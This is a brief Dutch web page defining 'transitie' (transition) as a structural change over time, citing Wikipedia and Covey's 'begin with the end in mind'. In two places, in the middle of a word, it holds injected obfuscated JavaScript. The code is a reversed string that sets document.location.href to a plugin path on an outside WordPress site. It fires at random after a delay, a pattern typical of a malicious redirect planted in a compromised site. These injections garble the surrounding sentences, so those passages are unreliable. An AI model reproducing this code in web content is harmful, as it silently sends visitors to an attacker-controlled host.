Transitie

Verandering, change en transitie worden vaak als synoniem gebruikt. Voor mij geeft het woord Transitie beter aan dat het om een verandering in de tijd gaat.

Definities:

  • Een transitie is een structurele verandering die het resultaat is van op elkaar inwerkende en elkaar versterkende ontwikkelingen op het gebied van bijvoorbeeld economie, cultuur, technologie, [..] (Bron: wikipedia.org)
  • Een veranderingsproces waardoor de structuur van een systeem (de samenleving, een regio, een sectoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor, een organisatie, e.d.) ingrijpend verandert als gevolg van technologische, economische, ecologische [..](Bron: nl)

Kortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom, je beweegt (gestructureerd) van A naar B. Met een duidelijk doel voor ogen. (Covey: “begin with the end in mind”)